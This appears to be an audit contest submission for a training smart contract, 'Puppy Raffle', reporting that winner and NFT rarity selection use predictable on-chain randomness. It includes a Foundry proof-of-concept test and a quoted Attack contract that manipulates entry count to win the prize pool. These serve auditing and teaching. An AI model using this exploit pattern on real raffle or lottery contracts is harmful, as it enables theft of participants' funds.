Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Winner and rarity use manipulable on-chain

cryptocrucible

### Root + Impact

**Normal behavior:** A random, unbiased draw selects the winner and NFT rarity after the raffle period.

**Issue:** Randomness is `keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))` modulo `players.length`. All inputs are visible or influenceable at transaction time. Any caller can precompute the winning index off-chain and only call `selectWinner()` when they win. Block builders/validators can bias `block.timestamp` and post-merge `block.difficulty` (PREVRANDAO) within protocol limits.

```solidity

// @> fully public entropy

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

...

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

```

**Interacts with:** H-01, C-01 (modulo includes zeroed refund slots)

## Risk

**Likelihood:**

- A searcher or entrant simulates the draw before broadcasting `selectWinner()`.

- MEV bots routinely exploit predictable pseudo-randomness in raffles and lotteries.

**Impact:**

- Winner selection is not fair; sophisticated actors capture prize pool and rare NFTs disproportionately.

- Undermines core product trust for a raffle protocol.

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

pragma experimental ABIEncoderV2;

import {Test} from "forge-std/Test.sol";

import {PuppyRaffle} from "../src/PuppyRaffle.sol";

/// @notice PoC for H-02: winner index is fully determined by public block/caller entropy.

contract H_02_WeakPredictablePRNG is Test {

function test_poc() public {

PuppyRaffle raffle = new PuppyRaffle(1 ether, address(99), 1 days);

address[] memory players = new address[](4);

players[0] = address(1);

players[1] = address(2);

players[2] = address(3);

players[3] = address(4);

raffle.enterRaffle{value: 4 ether}(players);

vm.warp(block.timestamp + 1 days + 1);

uint256 predicted =

uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % 4;

raffle.selectWinner();

assertEq(raffle.previousWinner(), players[predicted]);

}

Recommended Mitigation

## Recommended Mitigation

- Replace with Chainlink VRF, RANDAO commit-reveal, or another auditable external randomness source.

- Sample only over active players after fixing refund accounting.

```diff

-uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+uint256 winnerIndex = _drawFromVRF(activePlayerCount);

```

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!